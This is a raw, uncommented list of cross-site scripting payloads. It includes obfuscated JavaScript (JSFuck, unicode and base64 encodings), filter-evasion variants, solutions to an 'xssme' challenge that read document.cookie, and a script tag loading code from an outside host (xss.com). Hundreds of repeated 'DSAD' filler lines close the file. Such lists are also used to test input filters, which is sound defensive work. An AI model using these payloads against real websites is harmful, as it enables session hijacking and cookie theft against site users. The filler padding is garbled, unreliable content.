<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<img src="1" onerror="alert(1)" />
<iframe src="javascript:alert(1)"></iframe>
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
'"--></style></script><script>shadowlabs(0x000045)</script>
<<scr\0ipt/src=http://xss.com/xss.js></script
' onmouseover=alert(/Black.Spook/)
"><iframe src="http://google.com"% 3E
'"--></style></script><script>RWAR(0x00010E)</script>
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
x”</title><img src=x onerror=alert(1)>
<script> document.getElementById("safe123").setCapture(); document.getElementById("safe123").click(); </script>
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
<script>(function() {var event = document.createEvent("MouseEvents");event.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>
<script>alert(document.documentElement.innerHTML.match(/'([^']+)/)[1])</script>
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']+)/)[1])</script>
<script> d = document.createElement("div"); d.appendChild(document.head.cloneNode(true)); alert(d.innerHTML.match("cookie = '(.*?)'")[1]); </script>
<script> var xdr = new ActiveXObject("Microsoft.XMLHTTP"); xdr.open("get", "/xssme2?a=1", true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*?)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
<iframe id="ifra" src="/"></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write("<scr" + "ipt>top.foo = Object.defineProperty</scr" + "ipt>"); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
<script>alert(document.head.innerHTML.substr(146,20));</script>
<script>alert(document.head.childNodes[3].text)</script>
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
<script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")};document.body.appendChild(x);</script>
<script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>")};document.body.appendChild(x);</script>
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>
<script> document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click({'type':'click','isTrusted':true}); </script>
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click(test); </script>
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' + x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%3Dnew%20this.contentWindow.window.XMLHttpRequest%28%29%3Bfff.open%28%22GET%22%2C%22xssme2%22%29%3Bfff.onreadystatechange%3Dfunction%28%29%7Bif%20%28fff.readyState%3D%3D4%20%26%26%20fff.status%3D%3D200%29%7Balert%28fff.responseText%29%3B%7D%7D%3Bfff.send%28%29%3B></iframe>
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";getElementById("safe123").click=function()+{alert(Safe.get());};getElementById("safe123").click(test);</SCRIPT>#
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>#
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";document.getElementById("safe123").click=function()+{alert(Safe.get());};document.getElementById("safe123").click(test);'><source>#
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
<iframe src="404" onload="frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>
<iframe src="404" onload="content.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>
<iframe src="404" onload="self.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>
<iframe src="404" onload="top.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
<iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href="javascript:\"<script>var%20xhr%20%3D%20new%20XMLHttpRequest()%3Bxhr.open('GET'%2C%20'http%3A%2F%2Fhtml5sec.org%2Fxssme2'%2C%20true)%3Bxhr.onload%20%3D%20function()%20%7B%20alert(xhr.responseText.match(%2Fcookie%20%3D%20'(.*%3F)'%2F)%5B1%5D)%20%7D%3Bxhr.send()%3B<\/script>\"") autofocus></textarea>
<iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src="javascript:parent.x(window)"><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta onfocus="write('<script>alert(1)</script>')" autofocus></textarea>
<object data="data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=">
<script>function x(window) { eval(location.hash.substr(1)) }; open("javascript:opener.x(window)")</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload="xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();">`>
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ+ name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
<a target="x" href="xssme?xss=<script>addEventListener("DOMFrameContentLoaded", function(e) {e.stopPropagation();}, true);</script><iframe src="data:text/html,%3cscript%3eObject.defineProperty(top, 'MyEvent', {value: Object, configurable: true});function y() {alert(top.Safe.get());};event = new Object();event.type = 'click';event.isTrusted = true;y(event);%3c/script%3e"></iframe>
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src="javascript:parent.x(window);"></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
<a href="javascript:\u0061l&#101rt(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
<a href="jAvAsCrIpT:alert(1)">X</a>
<var onmouseover="prompt(1)">On Mouse Over</var>?
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															(
																1
																	)></iframe> ?
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	(	1	)></iframe>
<svg><script ?>alert(1)
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<img src=`xx:xx`onerror=alert(1)>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>?
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
<math><a xlink:href="//jsfiddle.net/t846h/">click
<a href="data:text/html;base64_,<svg/onload=\u0061l&#101rt(1)>">X</a
<svg contentScriptType=text/vbs><script>MsgBox+1
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text/j\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=/
<script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061lert(/XSS/)></script ????????????
<object data=javascript:\u0061l&#101rt(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->&#10alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
<img src ?itworksonchrome?\/onerror = alert(1)???
<svg><script>//
confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> ?
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
"><img src=x onerror=prompt(1);>
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD
DSAD